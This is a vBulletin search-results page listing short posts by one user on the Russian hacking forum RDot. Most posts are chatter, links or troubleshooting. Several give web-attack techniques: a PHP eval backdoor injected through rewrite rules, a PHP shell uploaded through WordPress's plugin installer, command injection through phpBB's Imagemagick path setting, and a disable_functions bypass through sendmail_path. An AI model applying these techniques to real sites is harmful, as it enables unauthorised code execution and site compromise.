Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 30.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Лаврушкин
Раздел: Обратная связь/Feedback 05.06.2019, 22:06
Ответов: 22
Важно: RDot.Org EOL Notice
Просмотров: 9,716
Автор Лаврушкин
Если делать совсем нечего, то идея с архивом -...

Если делать совсем нечего, то идея с архивом - пусть будет. Не знаю что там в ваших приватах, но и паблик достаточно хорош и приличен.

Единствнное чего бы точно не хотелось, это продажа, и не...
Раздел: Форумы 17.01.2016, 13:14
Ответов: 6
Просмотров: 22,462
Автор Лаврушкин
А блинд на каком-то движке? Попробуй базу...

А блинд на каком-то движке? Попробуй базу прошустрить на наличие путей.
если там пых и error_reporting позволяет - попробуй вызвать ошибку путем различного воздействия (PHPSESSID=&^#@,.php?param[]=,...
Раздел: Web-среда/Web-applications 09.11.2015, 00:40
Ответов: 3,618
Просмотров: 2,144,897
Автор Лаврушкин
Подробно разобрано...

Подробно разобрано https://rdot.org/forum/showthread.php?t=926
в особенности https://rdot.org/forum/showpost.php?p=10994&postcount=27
Раздел: Web-среда/Web-applications 08.11.2015, 16:01
Ответов: 3,618
Просмотров: 2,144,897
Автор Лаврушкин
Не уверен, но посмотри...

Не уверен, но посмотри http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927
В подробностях не разбирал.
Раздел: Коммерция/Сommerce 27.10.2015, 15:55
Ответов: 87
Просмотров: 100,791
Автор Лаврушкин
Оплатил для теста на неделю тариф TripleVPN. ...

Оплатил для теста на неделю тариф TripleVPN.
Пробовал подключится к 2 входным(SE1,UK1) и 6 выходным серверам - результат подключение по openvpn есть, а гугл даже не открывает.
перепробовал разные...
Раздел: Оффтоп/Offtopic 30.06.2015, 14:18
Ответов: 9
Просмотров: 5,982
Автор Лаврушкин
Кидать уже некого было, вот и закрылись. ...

Кидать уже некого было, вот и закрылись.
1337day и скаммер это уже синонимы, теперь вон на конференции в соседних топиках приглашают.
Раздел: Web-среда/Web-applications 29.05.2015, 16:20
Ответов: 3,618
Просмотров: 2,144,897
Автор Лаврушкин
Попробуй в плагин-инсталл в лоб скормить ему php...

Попробуй в плагин-инсталл в лоб скормить ему php файл. далее ищи свой файл в папке wp-content/uploads/год/месяц/файл, либо в папке wp-content/uploads/файл
Выдаст что
The package could not be...
Раздел: Сценарии/CMF/СMS 25.09.2014, 15:36
Ответов: 6
Просмотров: 12,049
Автор Лаврушкин
Это работает только со старыми версиями WP. где...

Это работает только со старыми версиями WP. где ключ для восстановления в чистом виде лежит в базе.
В новых версиях этот ключ уже хешеируется.
Раздел: Оффтоп/Offtopic 08.09.2014, 16:06
Ответов: 6
Просмотров: 5,394
Автор Лаврушкин
Не уверен насчёт 1400 за сутки на ип. подряд -...

Не уверен насчёт 1400 за сутки на ип. подряд - может быть. а если использовать таймайут небольшой между запросами и миксить пару ип? миллион конечно не прочекаешь за час. но бана я думаю можно будет...
Раздел: Релизы/Releases 29.07.2014, 16:25
Ответов: 43
Просмотров: 113,928
Автор Лаврушкин
В бинге изменилась выдача. и теперь там кстати...

В бинге изменилась выдача. и теперь там кстати много мусора непонятного.
в файле
classes/class.CBingReverseIP.php
измени функцию StartParsePage
На
protected function StartParsePage($content){...
Раздел: Квесты/CTF 27.05.2014, 15:22
Ответов: 8
Просмотров: 13,921
Автор Лаврушкин
Жаль что такой маленький обхват был сервисов...

Жаль что такой маленький обхват был сервисов майлру. у майлру дофигища поддоменов. и как показывает история, на них масса всяких вкусностей.
Раздел: Форумы 12.04.2014, 12:21
Ответов: 10
Просмотров: 16,206
Автор Лаврушкин
Если стили взять например. там theme_info.cfg...

Если стили взять например. там theme_info.cfg хотябы правится?(по стандартным путям) права на запись есть? Edit Theme работает?
Раздел: Web-среда/Web-applications 20.03.2014, 01:07
Ответов: 1
Просмотров: 5,973
Автор Лаврушкин
Заходишь в Custom Rewrite Rules Пишешь...

Заходишь в
Custom Rewrite Rules

Пишешь там

'rdot\' => ');@eval($_SERVER[HTTP_EVAL]);(1//'
И не забудь передать EVAL через HTTP-хидеры.
Раздел: Форумы 31.10.2013, 15:45
Ответов: 1
Просмотров: 9,607
Автор Лаврушкин
А подробнее можно?

А подробнее можно?
Раздел: Форумы 18.05.2013, 11:41
Ответов: 7
Просмотров: 14,872
Автор Лаврушкин
функция create_thumbnail в ласт версии phpbb без...

функция create_thumbnail в ласт версии phpbb без изменения.
выше в этой функции есть ещё условия. быть может они не выполняются. может passthru в disable. может быть ещё не одно НО.
поэтому...
Раздел: Уязвимости PHP/PHP vulnerabilities 05.02.2013, 19:49
Ответов: 7
Просмотров: 11,528
Автор Лаврушкин
Насколько я помню, то с абсолютным путем эта...

Насколько я помню, то с абсолютным путем эта штука не работает. и более универсальным считалась точка '.' )
Раздел: Повышение привилегий/Privilege escalation 28.12.2012, 13:01
Ответов: 12
Просмотров: 13,601
Автор Лаврушкин
Тестил кто?

Тестил кто?
Раздел: Статьи/Articles 21.09.2012, 10:08
Ответов: 67
Просмотров: 135,879
Автор Лаврушкин
ссылка http://php.net/manual/ru/wrappers.php...

ссылка http://php.net/manual/ru/wrappers.php более информативна. хотябы примеров что ли больше привел.
Раздел: Web-среда/Web-applications 18.06.2012, 15:56
Ответов: 8
Просмотров: 7,128
Автор Лаврушкин
Покажи реализацию чтения например /etc/passwd

Покажи реализацию чтения например /etc/passwd
Раздел: Форумы 22.04.2012, 23:23
Ответов: 7
Просмотров: 14,872
Автор Лаврушкин
Навеяло пред темой. Идем в...

Навеяло пред темой.
Идем в General->Attachment settings
Ставим галочки на Allow attachments,Display images inline,Create thumbnail
Там есть Imagemagick path: херачим туда что то вроде
sh -c...
Раздел: Web-среда/Web-applications 20.04.2012, 14:01
Ответов: 21
Просмотров: 17,144
Автор Лаврушкин
Нет не винда была. ответ нашёл сам. в шестом...

Нет не винда была. ответ нашёл сам. в шестом посте. Кстати на Win это не прокатит.
Расскажи про вариант с Win.
Раздел: Web-среда/Web-applications 16.04.2012, 01:33
Ответов: 21
Просмотров: 17,144
Автор Лаврушкин
Можно. Покурил сурсы пыха и разобрался. ...

Можно.
Покурил сурсы пыха и разобрался.
оказывается sendmail_path попадает в popen.
Сотвественно можно херачить прямо sendmail_path = "id >> /tmp/id"
Потом вызываем mail(); и радуемся.
Раздел: Web-среда/Web-applications 15.04.2012, 21:43
Ответов: 21
Просмотров: 17,144
Автор Лаврушкин
Там он как то автоматом чтоли подгружает через...

Там он как то автоматом чтоли подгружает через какое то время. ещё пока не разобрался. но соль в том что подгружает новый ini.


perl, ssi не вариант. а есть ещё варианты?
Раздел: Web-среда/Web-applications 15.04.2012, 18:40
Ответов: 21
Просмотров: 17,144
Автор Лаврушкин
php.ini и выполнение команд

Приветствую.
Такая ситуация.
disable_functions = exec,system...etc
Есть возможность редактирования php.ini.
Пытался перезаписать disable_functions ..не выходит. они где то на другом уровне...
Раздел: Уязвимости PHP/PHP vulnerabilities 22.12.2011, 08:32
Ответов: 8
Просмотров: 9,328
Автор Лаврушкин
На багтрекере пхп это светилось как минимум пару...

На багтрекере пхп это светилось как минимум пару раз.
Показано с 1 по 25 из 30.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot